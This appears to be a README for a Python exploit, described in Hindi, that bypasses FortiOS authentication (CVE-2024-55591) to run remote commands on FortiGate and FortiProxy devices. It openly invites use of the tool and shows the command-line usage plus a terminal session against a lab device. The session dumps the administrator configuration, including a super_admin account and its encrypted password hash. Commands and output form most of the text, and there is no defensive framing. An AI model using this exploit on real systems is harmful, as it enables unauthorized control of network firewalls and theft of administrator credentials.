
CVE-2024-55591 के लिए Python एक्सप्लॉइट, जो कमजोर FortiGate और FortiProxy उपकरणों पर दूरस्थ कमांड निष्पादित करने के लिए FortiOS प्रमाणीकरण को बायपास करता है।
Fortinet FortiOS में प्रमाणीकरण बाइपास शोषण योग्य
इस exp का उपयोग करके, आप प्रमाणीकरण को बायपास कर सकते हैं और cmd चला सकते हैं
sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 exp.py
usage: exp.py [-h] --target TARGET [--port PORT] [--username USERNAME] [--cmd CMD]
exp.py: error: the following arguments are required: --target/-t



sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 exp.py -t 192.168.182.188 -p 443 -u admin -c 'show system admin'
CLI websocket initialized
\x00l_Process_Access" "Local_Process_Access" "root" "" "" \x08"none" [192.168.182.1]:35950 [192.168.182.188]:443
Unknown action 0
FortiGate-VM64-KVM #
wait for next action
CLI websocket initialized
\x00_Process_Access" "Local_Process_Access" "root" "" "" \x08"none" [192.168.182.1]:40050 [192.168.182.188]:443
Unknown action 0
FortiGate-VM64-KVM #
wait for next action
CLI websocket initialized
\x00 system admin
config system admin
edit "admin"
set accprofile "super_admin"
set vdom "root"
set password ENC SH2brnbwbooMvuSyHfEe82/cs0ehaIB2Kf06G/QYlI67PLGoEVKGJCGbYGqItg=
next
end